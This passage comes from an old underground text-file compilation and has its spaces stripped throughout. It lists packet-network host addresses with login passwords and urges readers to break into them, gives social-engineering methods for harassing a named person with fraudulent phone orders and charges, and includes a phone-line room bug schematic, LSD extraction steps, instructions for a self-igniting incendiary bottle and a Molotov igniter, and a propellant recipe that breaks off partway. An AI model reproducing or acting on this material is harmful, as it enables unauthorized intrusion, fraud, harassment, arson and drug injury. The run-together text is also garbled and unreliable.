ItseemsthatnotmanyofyouknowthatTelenetisconnectedtoabout80 computernetworksintheworld.No,Idon'tmean80nodes,but80networkswith thousandsofunprotectedcomputers.WhenyoucallyourlocalTelenetgateway, youcanonlycallthosecomputerswhichacceptreversechargingcalls.Ifyou wanttocallcomputersinforeigncountriesorcomputersinUSAwhichdonot acceptRcalls,youneedaTelenetID.DidyouevernoticethatyoucantypeID XXXXwhenbeingconnectedtoTelenet?Youarethenaskedforthepassword.If youhavesuchaNUI(NetworkUserID)youcancallnearlyeveryhostconnected toanycomputernetworkintheworld.Herearesomeexamples:

026245400090184:IsaVAXinGermany(Username:DATEXPandleavemailforCHRIS) 0311050500061:IstheLosAlamosIntegratedcomputingnetwork(Oneofthehosts connectedtoitistheDNA(DefenseNuclearAgency)!!!) 0530197000016:IsaBBSinNewZealand 024050256:IstheSEBankinStockholm,Sweden(LoginasGAMES!!!) 02284681140541:CERNinGenevainSwitzerland(oneofthebiggestnuclear researchcentersintheworld)LoginasGUEST 0234212301161:AVideotexstandardsystem.TypeOPTELtogetinandusetheID 999_withthepassword9_ 0242211000001:UniversityofOsloinNorway(TypeLOGIN17,17toplaythe MultiUserDungeon!) 0425130000215:SomethinglikeITTDialcom,butthisoneisinIsrael!IDHELP withpasswordHELPworksfinewithsecuritylevel3 0310600584401:IstheWashingtonPostNewsServiceviaTymnet(Yes,Tymnetis connectedtoTelenet,too!)IDandPasswordis:PETERYoucanreadthenewsof thenextday! Theprefixesareasfollows: 02624isDatexPinGermany 02342isPSSinEngland 03110isTelenetinUSA 03106isTymnetinUSA 02405isTelepakinSweden 04251isIsranetinIsrael 02080isTranspacinFrance 02284isTelepacinSwitzerland 02724isEirpacinIreland 02704isLuxpacinLuxembourg 05252isTelepacinSingapore 04408isVenusPinJapan ...andsoon... Someofthecountrieshavemorethanonepacketswitchingnetwork(USAhas11, Canadahas3,etc). OK.Thatshouldbeenoughforthemoment.Asyouseemostofthepasswordsare verysimple.Thisisbecausetheymustnothaveanyfearofhackers.Onlyafew Germanhackersusethesenetworks.Mostofthecomputersareabsolutelyeasyto hack!!!So,trytofindoutsomeTelenetID'sandleavethemhere.Ifyouneed morenumbers,leaveemail.I'mcallingfromGermanyviatheGermanDatexP network,whichissimilartoTelenet.WehavealotofthoseNUI'sforthe Germannetwork,butnoneforaspecialTymnetoutdialcomputerinUSA,which connectsmetoanyphonenumber. Call026245621040000andtypeIDINF300withpasswordDATACOMtogetmore Informationsonpacketswitchingnetworks!ThenewpasswordfortheWashington PostisKING!!!! 154.FuckingwiththeOperatorbyTheJollyRoger Evergetanoperatorwhogaveyouahardtime,andyoudidn'tknowwhattodo? WelliftheoperatorhearsyouusealittleBelljargon,shemightwiseup.Here isalittlediagram(excusetheartwork)ofthestructureofoperators /\/\/\ !Operator!>!S.A.!>!BOS! \/\/\/ ! ! V /\

!GroupChief! \/ Nowmostoftheoperatorsarenotbugged,sotheycancurseatyou,iftheydo askINSTANTLYforthe"S.A."ortheServiceAssistant.Theoperatordoesnot reporttoher(95%ofthemarehers)buttheywillsolvemostofyourproblems. SheMUSTgiveyouhernameassheconnects&allofthesecallsarebugged.If theSAgivesyouaroughtimegetherBOS(BusinessOfficeSupervisor)onthe line.S/Hewillalmostalwaysbackhergirlsup,butsometimestheSAwillget tarredandfeathered.TheoperatorreportstotheGroupChief,andS/Hewill solve100%ofyourproblems,butthechancesofgettingS/Heonthelineare nill. Ifalineman(theguywhoworksoutonthepoles)oraninstallationmangives youtheworksasktospeaktotheInstallationForeman,thatworkswonders. Hereissomeotherbelljargon,thatmightcomeinhandyifyouarehaving troublewiththeline.Ortheycanbeusedtolieyourwayoutofsituations.... AnErlingisalinebusyfor1hour,usedmostlyintrafficstudiesAPermanent Signalisthatterriblehowlingyougetifyoudisconnect,butdon'thangup. Everyoneknowswhatabusysignalis,butsomeidiotsthinkthatisthe*Actual* ringingofthephone,whenitjustisatone"beeps"whenthephoneisringing, wouldn'tbetonthisthough,itcan(anddoes)getoutofsync. Whenyougetabusysignalthatis2timesasfastasthenormalone,theperson youaretryingtoreachisn'treallyonthephone,(hemightbe),itisactually thesignalthatatrunklinesomewhereisbusyandtheyhaven'torcan'treroute yourcall.SometimesyouwillgetaRecording,orifyougetnothingatall (LeftHigh&Dryinfoneterms)alltherecordingsarebeingusedandthesystem isreallyoverused,willprobablygodowninalittlewhile.Thishappenedwhen Kennedywasshot,thesystemjustcouldn'thandlethecalls.Bythewaythisis calledthe"reordersignal"andthetrunklineis"blocked". Onemorething,ifanoverseascallisn'tcompletedanddoesn'tgenerateany moneyforAT&T,iscalledan"Air&WaterCall". 155.PhrackMagazineVol.1,Issue1byTheIronSoldier "Vengeanceismine",saysthePhreak. METHOD1PHONELINEPHUN Callupthebusinessoffice.Itshouldbelistedatthefrontofthewhite pages.SayyouwantedtodisconnectScottKorman'sline.DIAL800xxxxxxx. "Hello,thisisMr.Korman,I'mmovingtoCaliforniaandwouldliketohavemy phoneservicedisconnected.I'mattheairportnow.I'mcallingfromapayphone, mynumberis[414]4455005.Youcansendmyfinalbillto:(somewherein California).Thankyou." METHOD2PHONEBOOKS Callupthebusinessofficefromapayphone.Say: "Hello,I'dliketoorderaPhoneBookforUpperVolta(oranyoutoftheway areawithDirectDialing).ThisisScottKorman,shipto3119N.44thSt. Milwaukee,WI53216.Yes,Iunderstanditwillcost$xx($25$75!!).Thankyou." METHOD3PHONECALLS CallupaPBX,enterthecodeandgetanoutsideline.Thendial0+thenumber

desiredtocall.Youwillhearabonkandthenanoperator.Say,"I'dliketo chargethistomyhomephoneat4144455005.Thankyou."AfriendandIdid thistoaloser,Icalledhimat1:00AMandweleftthefoneoffthehookall night.Icalculatedthatitcosthim$168. METHOD4MISC.SERVICES Callupthebusinessofficeonceagainfromapayfone.Sayyou'dlikecall waiting,forwarding,3way,etc.OnceagainyouarethefamedloserScott Korman.Hepaysyoulaugh.Youdon'tknowhowfunnyitwastalkingtohim,and wonderingwhatthoseclickshekepthearingwere. METHOD5CHANGED&UNPUB Dothesameasin#4,butsayyou'dliketochangeandunlistyour(Scott's) number.Anyonecallinghimwillget: "BEWBEWBEEP.Thenumberyouhavereached,4455005,hasbeenchangedtoa nonpublishednumber.Nofurther....." METHOD6FORWARDING Thisrequiredanaccompliceortwoorthree.AroundChristmastime,gotoToys 'R'Us.Geteveryoneatthecustomerserviceormanager'sdeskaway("Hey,could youhelpme").Thenyougetontheirphoneanddial(usuallydial9first)and thebusinessofficeagain.Thistime,sayyouarefromToys'R'Us,andyou'd liketoaddcallforwardingto4455005.Scottwillget100600callsaday!!! METHOD7RUSSIANCALLER Callapayphoneat10:00PM.Saytotheoperatorthatyou'dliketobookacall toRussia.Sayyouarecallingfromapayphone,andyournumberisthatofthe losertofry(e.g.4455005).Shewillsaythatshe'llhavetocallyabackin5 hours,andyouOKthat.Meanwhiletheloser(e.g.)Scott,willgetacallat 3:00AMfromanoperatorsayingthatthecallhebookedtoRussiaisready. 156.InternationalCountryCodeListingbyTheJollyRoger *UNITEDKINGDOM/IRELAND IRELAND.........................353 UNITEDKINGDOM...................44 *EUROPE ANDORRA..........................33 AUSTRIA..........................43 BELGIUM..........................32 CYPRUS..........................357 CZECHOLSLOVAKIA..................42 DENMARK..........................45 FINLAND.........................358 FRANCE...........................33 GERMANDEMOCRATICREPUBLIC.......37 GERMANY,FEDERALREPUBLICOF.....49 GIBRALTAR.......................350 GREECE...........................30 HUNGARY..........................36 ICELAND.........................354 ITALY............................39 LIECHTENSTEIN....................41 LUXEMBOURG......................352 MONACO...........................33

NETHERLANDS......................31 NORWAY...........................47 POLAND...........................48 PORTUGAL........................351 ROMANIA..........................40 SANMARINO.......................39 SPAIN............................34 SWEDEN...........................46 SWITZERLAND......................41 TURKEY...........................90 VATICANCITY.....................39 YUGOSLAVIA.......................38 *CENTRALAMERICA BELIZE.........................01 COSTARICA.....................06 ELSALVADOR....................03 GUATEMALA......................02 HONDURAS.......................04 NICARAGUA......................05 PANAMA.........................07 *AFRICA ALGERIA.........................213 CAMEROON........................237 EGYPT............................20 ETHIOPIA........................251 GABON...........................241 IVORYCOAST.....................225 KENYA...........................254 LESOTHO.........................266 LIBERIA.........................231 LIBYA...........................218 MALAWI..........................265 MOROCCO.........................212 NAMIBIA.........................264 NIGERIA.........................234 SENEGAL.........................221 SOUTHAFRICA.....................27 SWAZILAND.......................268 TANZANIA........................255 TUNISIA.........................216 UGANDA..........................256 ZAMBIA..........................260 ZIMBABWE........................263 *PACIFIC AMERICANSAMOA..................684 AUSTRALIA........................61 BRUNEI..........................673 FIJI............................679 FRENCHPOLYNESIA................689 GUAM............................671 HONGKONG.......................852 INDONESIA........................62 JAPAN............................81 KOREA,REPUBLICOF...............82 MALAYSIA.........................60 NEWCALEDONIA...................687

NEWZEALAND......................64 PAPUANEWGUINEA................675 PHILIPPINES......................63 SAIPAN..........................670 SINGAPORE........................65 TAIWAN..........................886 THAILAND.........................66 *INDIANOCEAN PAKISTAN.........................92 SRILANKA........................94 *SOUTHAMERICA ARGENTINA.......................4 BOLIVIA........................91 BRAZIL..........................5 CHILE...........................6 COLOMBIA........................7 ECUADOR........................93 GUYANA.........................92 PARAGUAY.......................95 PERU............................1 SURINAM........................97 URUGUAY........................98 VENEZUELA.......................8 *NEAREAST BAHRAIN.........................973 IRAN.............................98 IRAQ............................964 ISRAEL..........................972 JORDAN..........................962 KUWAIT..........................965 OMAN............................968 QATAR...........................974 SAUDIARABIA....................966 UNITEDARABEMIRATES............971 YEMENARABREPUBLIC.............967 *CARIBBEAN/ATLANTIC FRENCHANTILLES................96 GUANTANAMOBAY(USNAVYBASE)...3 HAITI..........................09 NETHERLANDSANTILLES...........99 ST.PIERREANDMIQUELON........08 *INDIA INDIA............................91 *CANADA TOCALLCANADA,DIAL1+AREACODE+LOCALNUMBER. *MEXICO TOCALLMEXICO,DIAL011+52+CITYCODE+LOCALNUMBER.

Todialinternationalcalls: InternationalAccessCode+Countrycode+Routingcode Example: TocallFrankfurt,Germany,youwoulddothefollowing: 011+49+611+(#wanted)+#sign(octothrope) The#signattheendistotellBellthatyouaredoneenteringinallthe neededinfo. 157.TheInfinityTransmitter:by<<>> FROMTHEBOOKBUILDYOUROWN LASER,PHASER,IONRAYGUN&OTHERWORKINGSPACEAGEPROJECTS BYROBERTIANNINI(TABBOOKSINC.) Description:Briefly,theInfinityTransmitterisadevicewhichactivatesa microphoneviaaphonecall.Itispluggedintothephoneline,andwhenthe phonerings,itwillimmediatelyintercepttheringandbroadcastintothe phoneanysoundthatisintheroom.Thisdevicewasoriginallymadeby InformationUnlimited,andhadatouchtonedecodertopreventallwhodidnot knowthecodefrombeingabletousethephoneinitsnormalway.Thisversion, however,willactivatethemicrophoneforanyonewhocallswhileitisin operation. NOTE:Itisillegaltousethisdevicetotrytobugsomeone.Itisalsopretty stupidbecausetheyarefairlynoticeable. PartsList: PretendthatuFmeansmicroFarad,cap=capacitor Part#Description R1,4,83390kwattresistor R215.6Mwattresistor R3,5,636.8kwattresistor R7/S115kpot/switch R9,162100kwattresistor R1012.2kwattresistor R13,1821kwattresistor R141470ohmwattresistor R15110kwattresistor R1711Mwattresistor C11.05uF/25Vdisccap C2,3,5,6,751uF50Velectrolyticcaportant(preferablynonpolarized) C4,11,123.01uF/50Vdisccap C8,102100uF@25Velectrolyticcap C915uF@150Velectrolyticcap C13110uF@25Velectrolyticcap TM11555timerdip A11CA3018amparrayincan Q1,22PN2222npnsiltransistor Q31D4OD5npnpwrtabtransistor D1,2250V1ampreact.1N4002 T111k/500matchingtransformer M11largecrystalmicrophone J11Phonojackoptionalforsenseoutput

WR3(24")#24redandblackhookupwire WR4(24")#24blackhookupwire CL3,42Alligatorclips CL1,226"batterysnapclips PB1113/4x4x.1perfboard CA115x3x21/8greyenclosurefab WR15(12")#24busswire KN11smallplasticknob BU11smallclampbushing B1,229volttransistorbatteryor9Vnicad CircuitOperation:Notbeingthemosttechnicalguyintheworld,andnotbeing verygoodatelectronics(yet),I'mjustrepeatingwhatMr.Iannini'ssaidabout thecircuitoperation.TheTransmitterconsistsofahighgrainamplifierfed intothetelephonelinesviatransformer.Thecircuitisinitiatedbytheaction ofavoltagetransientpulseoccurringacrossthephonelineattheinstant thetelephonecircuitismade(thering,inotherwords).Thistransient immediatelytriggersatimerwhoseoutputpin3goespositive,turningon transistorsQ2andQ3.TimerTM1nowremainsinthisstateforaperiod dependingonthevaluesofR17andC13(usuallyabout10secondsforthe valuesshown).WhenQ3isturnedonbythetimer,asimulated"offhook" conditioniscreatedbytheswitchingactionofQ3connectingthe500ohm windingofthetransformerdirectlyacrossthephonelines.Simultaneously, Q2clampsthegroundofA1,amplifier,andQ1,outputtransistor,tothe negativereturnofB1,B2,thereforeenablingthisamplifiersection.Notethat B2isalwaysrequiredbysupplyingquiescentpowertoTM1duringnormal conditions.Systemisoff/oncontrolledbyS1(switch).Acrystalmikepicksup thesoundsthatarefedtothefirsttwotransistorsoftheA1arrayconnected asanemitterfollowerdrivingtheremainingtwotransistorsascascaded commonemitters.OutputofthearraynowdrivesQ1capacitivelycoupledtothe 1500ohmwindingofT1.R7controlsthepickupsensitivityofthesystem. DiodeD1isforwardbiasedattheinstantofconnectionandessentially appliesanegativepulseatpin2ofTM1,initiatingthecycle.D2clampsany highpositivepulses.C9dcisolatesanddesensitizesthecircuit.Thesystem describedshouldoperatewhenanyincomingcallismadewithoutringingthe phone. SchematicDiagram:Becausethisistext,thisdoesn'tlooktoohot.Pleaseuse alittleimagination!Iwillhopefullygetagraphicsdrawingofthisoutas soonasIcanonaFontrixgraffile. Tobeabletoseewhateverythingis,thischaracter:|shouldappearasa horizontalbar.Ididthisona][eusinga][e80columncard,soI'msorryif itlookskindaweirdtoyou. Symbols: resistor:/\/\/switch:_/_ battery:|!|!capacitor(electrolytic):|( capacitor(disc):||__ transistor:(c)>(e)Transformer:)||( \_/)||( |(b)_)||(_ diode:|< chip:._____. !_____!(chipsareeasytorecognize!) Dotsimplyaconnectionbetweenwires.NODOT,NOCONNECTION. i.e..:_!_meansaconnectionwhile_|_meansnoconnection. + .________________________toGREENwirephoneline |

|.______________________toREDwirephoneline || ||._________(M1)______________. |||| |||R1| ||!__________/\/\/____________! |||_!_C1 |||thiswireistheamp___ |||<=ground|R2 |||!___________________/\/\/_____________. |||._______!_______.| ||!___________________!4911!_____________________________! |||||| ||!___________________!712._____________________________! ||||A1|R3| ||!___________________!10____*8!_______.____/\/\/____________! ||||/||| |||C4|/|\|2ma ||!____||______.|/|/R4B1+ |||||||/|\| |||R7|C2|/|/| ||!____/\/\/___!__)|__!8*_/||S1| |||^|6!_______!neg<__/.__! ||||C3|||C5return| |||!_____|(___.__!3|'|(|| |||||51!____________!| |||\!_______._______!|B2| ||!________.R8/||+ |||\||R6|3ma |||!__________!____________________|_____/\/\/______! |||R5||| ||!__/\/\/___________|____________________!| ||||| ||||| |||C6|| ||||)|'R9| |||!_________________/\/\/_______.| |||||| |||Q1_!_|R10| ||!____________/\____________________________!__/\/\/_____! ||||| ||||| |||C8|| ||!__________)|_______________________________|____________! ||!|| ||/|| ||||| |||\|| |||>|| |||||| |||||| |||!_____________.|| |||||| ||!__________.||| |||||| |!________.||._____!| |||||| |||||| |||||C7| ||||'|(|| ||_________|_________!_______.T1._________________|| |||1500)||(500|

|||ohm)||(ohm| ||!______.)||(.__.| ||||| ||||| |||>| ||||/| |||+|Q3| |||||\| !____________________|_________|_______|______!__.D1C9| |||'|<|(|| .______________!|||| ||||| |.________________!||| ||||| \|.________________!C11|| /||.___||____________!| R13\||||||| /||||| \!___.___|_______________________!|| |||||R16|R15| |v||!___/\/\/\________!___/\/\/_! |neg|||D2|| |return||!_____|<__________!| |B1,B2|\||| ||/|.____________!_.| ||\R14|C12|TM12|| ||/!_||_!54!_______! ||\|||||| |||!____!18!_______! |||||763|| ||||!_____._.____._!| |||||||| ||||C13|||R17| |||!___)|_____!_!____|__/\/\/__! |||||| !___________|___!_______________________|_________________!| |||| |\|C10| |/R18!__________)|_______________! |\ |/ || !___OJ1 senseoutput Constructionnotes:Becausethedamnedbookjustgaveapictureinsteadofstep bystepinstructions,andI'lltrytogiveyouasmuchhelpaspossible.Note thatallthepartsthatyouwillbeusingareclearlylabeledintheschematic. Theperfboard,knobs,'gatorclips,etcareoptional.Idostronglysuggestthat youdousetheboard!!!Itwillmakewiringthecomponentsupmuchmucheasier thanifyoudon'tuseit.Theknobyoucanusetocontrolthepot(R7).R7is usedtotunetheITsothatissoundsOkoverthephone.(Yougettodetermine whatsoundsgood)BychangingthevalueofC13,youcanchangetheamountof timethatthecircuitwillstayopen(itcannotdetectahangup,soitworkson atimer.)Avalueof100microFaradswillincreasethetimebyabout10times. Theswitch(S1)determineswhetherornottheunitisoperational.Closedison. Openisoff.Thenegativereturnisthenegativeterminalsofthebattery!!The batterieswilllooksomethinglikethiswhenhookedup: <v_____..______.._____..____> |||||| __!___!__||__!___!__

|+|!_/_!|+| ||switch^|| |9volts|||9volts| !_______!negreturn!_______! Tohookthisuptothephoneline,therearethreeways,dependinguponwhat typeofjackyouhave.Ifitistheoldtype(nonmodular)thenyoucanjust openupthewallplateandconnectthewiresfromthetransmitterdirectlyto theterminalsofthephone. Ifyouhaveamodularjackwithfourprongs,attachtheredtothenegative prong(don'taskmewhichiswhich!Idon'thavethattypeofjack...I'veonly seentheminstores),andthegreentothepositiveprong,andplugin.Trynot toshockyourself... Ifyouhavetheclipintypejack,getdoublemaleextensioncord(onewitha cliponeachend),andchopoffoneclip.Getasharpknifeandspliceoffthe grayprotectivematerial.Youshouldseefourwires,includingonegreenandone red.YouattachtheappropriatewiresfromtheITtothesetwo,andplugthe otherendintothewall. GettingtheITtowork:Ifyouhappentohaveaproblem,youshouldattemptto dothefollowing(thesearecommonsenserules!!)Makesurethatyouhavethe polarityofallthecapacitorsright(ifyouusedpolarizedcapacitors,that is).Makesurethatallthesolderingisdonewellandhasnotshortcircuited somethingaccidentally(likeifyouhaveaglobtouchingtwowireswhichshould notbetouching.)Checkforothershortcircuits.Checktoseeifthebatteryis inright.Checktomakesuretheswitchisclosed.Ifitstilldoesn'twork, dropmealineononeoftheMarylandorVirginiaBBSsandI'lltrytohelpyou out. Thesenseoutput:Somehoworother,itispossibletohooksomethingelseupto thisandactivateitbyphone(likeanalarm,flashinglights,etc.) 158.LSDbyTheJollyRoger Ithink,ofallthedrugsontheblackmarkettoday,LSDisthestrangest.Itis themostrecentmajordrugtocometolifeinthepsychedelicsubculture.(Blah blahblah...let'sgettothegoodstuff:Howtomakeitinyourkitchen!!) 1. Grindup150gramsofMorningGloryseedsorbabyHawaiianwoodrose seeds. 2. In130cc.ofpetroleumether,soaktheseedsfortwodays. 3. Filterthesolutionthroughatightscreen. 4. Throwawaytheliquid,andallowtheseedmushtodry. 5. Fortwodaysallowthemushtosoakin110cc.ofwoodalcohol. 6. Filterthesolutionagain,savingtheliquidandlabelingit"1." 7. Resoakthemushin110cc.ofwoodalcoholfortwodays. 8. Filterandthrowawaythemush. 9. Addtheliquidfromthesecondsoaktothesolutionlabeled"1." 10. Pourtheliquidintoacookietrayandallowittoevaporate. 11. Whenalloftheliquidhasevaporated,ayellowgumremains.Thisshould bescrapedupandputintocapsules. 30gramsofMorningGloryseeds=1trip 15Hawaiianwoodroseseeds=1trip

Manycompanies,suchasNorthopKinghavebeencoatingtheirseedswithatoxic chemical,whichispoison.Orderseedsfromawholesaler,asitismuchsafer andcheaper.Hawaiianwoodroseseedscanbeordereddirectlyfrom:

Chong'sNurseryandFlowers P.O.Box2154 Honolulu,Hawaii LSDDOSAGES Thebasicdosagesofacidvaryaccordingtowhatkindofacidisavailableand whatmediumofingestionisused.Chemically,thepotencyofLSD25ismeasured inmicrograms,ormics.Ifyou'rechemicallymindedormakingyourownacid, thencomputingthenumberofmicrogramsisveryimportant.Usuallybetween500 and800micsisplentyforan8hourtrip,dependingonthequalityoftheacid, ofcourse.Ihaveheardofpeopletakingasmuchas1,5002,000mics.Thisis notonlyextremelydangerous,itisextremelywasteful. LSDcomespackagedinmanydifferentforms.Themostcommonarelistedbelow: 1. Thebrownspot,orapieceofpaperwithadrieddropofLSDonit,is alwaysaround.Usuallyonespotequalsonetrip. 2. Capsuledacidisverytricky,asthecapcanbealmostanycolor,size,or potency.Alwaysaskwhattheacidiscutwith,asalotofacidiscutwith eitherspeedorstrychnine.Alsonotedosage. 3. Smallwhiteorcoloredtabletshavebeenknowntocontainacid,but,as withcapsuledacid,it'simpossibletotellpotency,withoutasking. 159.BananasbyTheJollyRoger Believeitornot,bananasdocontainasmallquantityof_MusaSapientum bananadine_,whichisamild,shortlastingpsychedelic.Therearemucheasier waysofgettinghigh,butthegreatadvantagetothismethodisthatbananasare legal. 1. Obtain15lbs.ofripeyellowbananas. 2. Peelall15lbs.andeatthefruit.Savethepeels. 3. Withasharpknife,scrapeofftheinsidesofthepeelsandsavethe scrapedmaterial. 4. Putallofthescrapedmaterialinalargepotandaddwater.Boilfor threetofourhoursuntilithasattainedasolidpasteconsistency. 5. Spreadthispasteoncookiesheets,anddryinanoverforabout20 minutestoahalfhour.Thiswillresultinafineblackpowder.Makesaboutone poundofbananadinepowder.Usuallyonewillfeeltheeffectsofbananadine aftersmokingthreeorfourcigarettes. TableofWeights Pounds Ounces Grams Kilos 1 16 453.6 0.4536 0.0625 1 28.35 0.0283 0.0022 0.0352 1 0.001 2.205 35.27 1,000 1 160.YummyMarihuanaRecipesbyTheJollyRoger AcapulcoGreen 3ripeavocados cupchoppedonions 2teaspoonschilipowder 3tablespoonswinevinegar cupchoppedmarihuana(grass) Mixthevinegar,grass,andchilipowdertogetherandletthemixturestandfor onehour.Thenaddavocadosandonionsandmashitalltogether.Itcanbe servedwithtacosorasadip.

PotSoup 1cancondensedbeefbroth 3tablespoonsgrass 3tablespoonslemonjuice canwater 3tablespoonschoppedwatercress Combineallingredientsinasaucepanandbringtoaboilovermediumheat. Placeinarefrigeratorfortwotothreehours,reheat,andserve. PorkandBeansandPot 1largecan(1lb.13oz.)porkandbeans cupgrass 4slicesbacon cuplightmolasses teaspoonhickorysalt 3pineapplerings Mixtogetherinacasserole,covertopwithpineappleandbacon,bakeat350 forabout45minutes.Servesaboutsix. TheMeatBall 1lb.hamburger cupchoppedonions 1cancreamofmushroomsoup cupbreadcrumbs 3tablespoonsgrass 3tablespoonsIndiarelish Mixitallupandshapeintomeatballs.Browninfryingpananddrain.Placein acasserolewithsoupandcupwater,coverandcookoverlowheatforabout30 minutes.Feedsaboutfourpeople. SpaghettiSauce 1can(6oz.)tomatopaste 2tablespoonsoliveoil cupchoppedonions cupchoppedgrass 1pinchpepper 1can(6oz.)water clovemincedgarlic 1bayleaf 1pinchthyme teaspoonsalt Mixinlargepot,coverandsimmerwithfrequentstirringfortwohours.Serve overspaghetti. PotLoaf 1packetonionsoupmix 1(16oz.)canwholepeeledtomatoes cupchoppedgrass 2lbs.groundbeeforchickenorturkey 1egg 4slicesbread,crumbled Mixallingredientsandshapeintoaloaf.Bakeforonehourin400oven. Servesaboutsix. ChiliBeanPot 2lbs.pintobeans

1lb.bacon,cutintotwoinchsections 2cupsredwine 4tablespoonschilipowder clovegarlic 1cupchoppedgrass cupmushrooms

Soakbeansovernightinwater.Inalargepotpourboilingwateroverbeansand simmerforatleastanhour,addingmorewatertokeepbeanscovered.Nowadd allotheringredientsandcontinuetosimmerforanotherthreehours.Saltto taste.Servesaboutten. BirdStuffing 5cupsryebreadcrumbs 2tablespoonspoultryseasoning cupeachofraisinsandalmonds cupcelery 1/3cupchoppedonions 3tablespoonsmeltedbutter cupchoppedgrass 2tablespoonsredwine Mixitalltogether,andthenstuffitin. ApplePot 4apples(cored) cupbrownsugar cupwater 4cherries 1/3cupchoppedgrass 2tablespoonscinnamon Powderthegrassinablender,thenmixgrasswithsugarandwater.Stuffcores withthispaste.Sprinkleappleswithcinnamon,andtopwithacherry.Bakefor 25minutesat350. PotBrownies cupflour 3tablespoonsshortening 2tablespoonshoney 1egg(beaten) 1tablespoonwater cupgrass pinchofsalt teaspoonbakingpowder cupsugar 2tablespoonscornsyrup 1squaremeltedchocolate 1teaspoonvanilla cupchoppednuts Siftflour,bakingpowder,andsalttogether.Mixshortening,sugar,honey, syrup,andegg.Thenblendinchocolateandotheringredients,andmixwell. Spreadinan8inchpanandbakefor20minutesat350. BananaBread cupshortening 2eggs 1teaspoonlemonjuice 3teaspoonsbakingpowder 1cupsugar 1cupmashedbananas

2cupssiftedflour cupchoppedgrass teaspoonsalt 1cupchoppednuts

Mixtheshorteningandsugar,beateggs,andaddtomixture.Separatelymix bananaswithlemonjuiceandaddtothefirstmixture.Siftflour,salt,and bakingpowdertogether,thenmixallingredientstogether.Bakefor1hoursat 375. SesameSeedCookies 3oz.groundroastsesameseeds 3tablespoonsgroundalmonds teaspoonnutmeg cuphoney teaspoongroundginger teaspooncinnamon oz.grass Toastthegrassuntilslightlybrownandthencrushitinamortar.Mixcrushed grasswithallotheringredients,inaskillet.Placeskilletoverlowflameand add1tablespoonofsaltbutter.Allowittocook.Whencool,rollmixtureinto littleballsanddipthemintothesesameseeds. Ifyouhappentobeinthecountryataplacewherepotisbeinggrown,here's oneofthegreatestrecipesyoucantry.Pickamediumsizedleafoffofthe marihuanaplantanddipitintoacupofdrawnbutter,addsalt,andeat. 161.PeanutsbytheJollyRoger Trythissometimewhenyouarebored! 1. 2. 3. 4. Takeonepoundofrawpeanuts(notroasted!) Shellthem,savingtheskinsanddiscardingtheshells. Eatthenuts. Grinduptheskinsandrollthemintoacigarette,andsmoke!

You'llhavefun,believeme! 162.ChemicalFireBottlebytheJollyRoger Thisincendiarybottleisselfignitingontargetimpact. MaterialsRequired Material HowUsed CommonSource SulphuricAcid StorageBatteries MotorVehicles MaterialProcessing IndustrialPlants Gasoline MotorFuel GasStation MotorVehicles PotassiumChlorate Medicine DrugStores Sugar SweeteningFoods FoodStore Glassbottlewithstopper(roughly1quartsize) SmallBottleorjarwithlid. Ragorabsorbentpaper(papertowels,newspaper) Stringorrubberbands

Procedure: 1. SulphuricAcidMUSTbeconcentrated.Ifbatteryacidorotherdiluteacid isused,concentrateitbyboilinguntildensewhitefumesaregivenoff. Containerusedtoboilshouldbeofenamelwareorovenglass.

CAUTION:SulphuricAcidwillburnskinanddestroyclothing.Ifanyis spilled,washitawaywithalargequantityofwater.FumesarealsoVERY dangerousandshouldnotbeinhaled. 2. Removetheacidfromheatandallowtocooltoroomtemperature. 3. Pourgasolineintothelarge1quartbottleuntilitisapproximately1/3 full. 4. Addconcentratedsulphuricacidtogasolineslowlyuntilthebottleis filledtowithin1"to2"fromtop.Placethestopperonthebottle. 5. Washtheoutsideofthebottlethoroughlywithclearwater. CAUTION:Ifthisisnotdone,thefirebottlemaybedangeroustohandle duringuse! 6. Wrapacleanclothorseveralsheetsofabsorbentpaperaroundtheoutside ofthebottle.Tiewithstringorfastenwithrubberbands. 7. Dissolvecup(100grams)ofpotassiumchlorateandcup(100grams)of sugarinonecup(250cc)ofboilingwater. 8. Allowthesolutiontocool,pourintothesmallbottleandcaptightly. Thecooledsolutionshouldbeapprox.2/3crystalsand1/3liquid.Ifthereis morethanthis,pouroffexcessbeforeusing. CAUTION:Storethisbottleseparatelyfromtheotherbottle! HowToUse: 1. Shakethesmallbottletomixcontentsandpourontotheclothorpaper aroundthelargebottle.Bottlecanbeusedwetoraftersolutionisdried. However,whendry,thesugarPotassiumchloratemixtureisverysensitiveto sparkorflameandshouldbehandledaccordingly. 2. Throworlaunchthebottle.Whenthebottlebreaksagainstahardsurface (target)thefuelwillignite. 163.IgniterfromBookMatchesbyTheJollyRoger Thisisahotignitermadefrompaperbookmatchesforusewithmolotovcocktail andotherincendiaries. MaterialRequired: Paperbookmatches Adhesiveorfrictiontape Procedure: 1. Removethestaple(s)frommatchbookandseparatematchesfromcover. 2. Foldandtapeonerowofmatches(foldinthirds) 3. Shapethecoverintoatubewithstrikingsurfaceontheinsideandtape. Makesurethefoldercoverwillfittightlyaroundthetapedmatchheads.Leave coveropenatoppositeendforinsertionofthematches. 4. Pushthetapedmatchesintothetubeuntilthebottomendsareexposed about3/4in.(2cm) 5. Flattenandfoldtheopenendofthetubesothatitlapsoverabout1in. (2cm);tapeinplace. UsewithaMolotovCocktail: 1. Tapethe"matchendtab"oftheignitertotheneckofthemolotov cocktail. 2. Graspthe"coverandtab"andpullsharplyorquicklytoignite. GeneralUse: Thebookmatchignitercanbeusedbyitselftoigniteflammableliquids,fuse

cords,andsimilaritemsrequiringhotignition. CAUTION:Storematchesandcompletedignitersinmoistureproofcontainerssuch asrubberorplasticbagsuntilreadyforuse.Damporwetpaperbookmatches willnotignite. 164."RedorWhitePowder"PropellantbytheJollyRoger "RedorWhitePowder"Propellantmaybepreparedinasimple,safemanner.The formulationdescribedbelowwillresultinapproximately2poundsofpowder. Thisisasmallarmspropellantandshouldonlybeusedinweaponswithin. diameterorless(butnotpistols!). MaterialRequired: HeatSource(KitchenStoveoropenfire) 2gallonmetalbucket Measuringcup(8ounces) Woodenspoonorrubberspatula Metalsheetoraluminumfoil(atleast18in.sq.) Flatwindowscreen(atleast1footsquare) PotassiumNitrate(granulated)21/3cups Whitesugar(granulated)2cups Powderedferricoxide(rust)1/8cup(ifavailable) Clearwater,1cups Procedure: 1. Placethesugar,potassiumnitrate,andwaterinthebucket.Heatwitha lowflame,stirringoccasionallyuntilthesugarandpotassiumnitratedissolve. 2. Ifavailable,addtheferricoxide(rust)tothesolution.Increasethe flameunderthemixtureuntilitboilsgently. NOTE:Themixturewillretaintherustcoloration. 3. Stirandscrapethebucketsidesoccasionallyuntilthemixtureisreduced toonequarterofitsoriginalvolume,thenstircontinuously. 